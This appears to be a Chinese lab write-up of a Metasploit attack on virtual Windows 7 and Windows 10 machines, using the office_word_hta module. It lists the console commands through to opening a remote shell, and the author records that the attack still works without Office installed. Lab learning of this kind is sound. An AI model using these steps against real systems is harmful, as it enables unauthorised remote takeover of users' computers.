利用木馬對windows進行滲透
本實驗在虛擬機器環境下進行!!!
準備:
Kali ip: 192.168.0.107
Win7帶office2010 ip:192.168.0.108
我們先啟動msfconsole並使用模組
use exploit/windows/fileformat/office_word_hta
檢視目標
show targets
可以看到目標是ms office word文件
檢視選項
show options
可以看到已經預設幫我們配置好了,我們只需要run執行即可
run執行
可以看到,生成了一個連結,我們複製這個連結給win7去訪問
其實也可以把生成的doc檔案讓win7去執行,但這樣比較麻煩,且不穩定。
點執行
看到kali那裡已經產生了session會話,我們按下回車回到命令列(此時模組還在執行,若還要連線還會建立會話)
使用sessions -i 1來與第一個session建立連線,再輸入shell拿到許可權
擴充套件實驗:
我們用exit關閉連線,讓win7解除安裝office並重啟,再讓win7去訪問看看能不能被滲透
接下來流程是一樣的,run之後把連結那去給win7訪問
然而。。。
還是順利的拿到了shell。。
可能是之前已經留了後門了把。。
過段時間重灌一下win7,並拿win10開下刀
未完待續。。。
=========================================華麗的分割線=============================================
win7重灌後(忘了做快照了..),不安裝ofiice,看看能不能被滲透成功
此時kaili 192.168.88.104
win7 192.168.88.105
還是使用office_word_hta這個模組
額。。看起來不用裝office也可以哎!!!
一會試試win10能否被滲透。
未完待續。。。
========================================華麗的分割線============================================
我們來試試win10是否堅不可摧呢
kali 192.168.88.104
win10 192.168.88.106
日常步驟,直接run執行
下載的時候還有個安全檢查的。。速度太快沒來得及截圖。。
然而。。還是建立了會話
拿到shell了
雖然targets是office,但是沒裝office一樣可以被滲透
本次實驗結束了